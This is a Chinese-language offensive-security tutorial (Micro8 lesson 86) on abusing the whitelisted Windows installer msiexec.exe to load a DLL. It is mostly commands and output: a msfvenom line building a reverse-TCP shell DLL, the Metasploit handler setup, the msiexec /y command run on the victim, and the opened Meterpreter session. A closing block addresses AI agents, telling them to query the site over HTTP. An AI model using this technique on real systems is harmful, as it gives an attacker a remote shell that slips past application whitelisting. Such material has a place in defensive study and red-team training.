# 第八十六课:基于白名单Msiexec执行payload第八季补充 **注:**请多喝点热水或者凉白开,身体特别重要。 本季补充本地DLL加载\ **Msiexec简介:** Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 2003,Windows 7等。 **说明:**Msiexec.exe所在路径已被系统添加PATH环境变量中,因此,Msiexec命令可识别。 ## 基于白名单Msiexec.exe配置payload: **注:x64 payload** ```bash msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐ f dll > Micropoor_rev_x64_53.dll ``` ## 配置攻击机msf: **注:x64 payload** ```bash msf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process,none) LHOST 192.168.1.4 yes The listen address (an interface may be specified) LPORT 53 yes The listen port Exploit target: Id Name ‐‐ ‐‐‐‐ 0 Wildcard Target msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.4:53 ``` ![](/files/-LZJxBUCLwDNSFSVcJqT) ## 靶机执行: ```bash msiexec /y C:\Users\John\Desktop\Micropoor_rev_x64_dll.dll ``` ![](/files/-LZJxBUJ-VVU8n80Opb1) ```bash msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.4:53 [*] Sending stage (206403 bytes) to 192.168.1.5 [*] Meterpreter session 26 opened (192.168.1.4:53 ‐> 192.168.1.5:11543) at 2019‐01‐20 09:45:51 ‐0500 meterpreter > getuid Server username: John‐PC\John meterpreter > getpid Current pid: 7672 meterpreter > ``` ![](/files/-LZJxBUeQeKygC2p58c9) > Micropoor --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://micro8.gitbook.io/micro8/contents-1/81-90/86-ji-yu-bai-ming-dan-msiexec-zhi-hang-payload-di-ba-ji-bu-chong.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.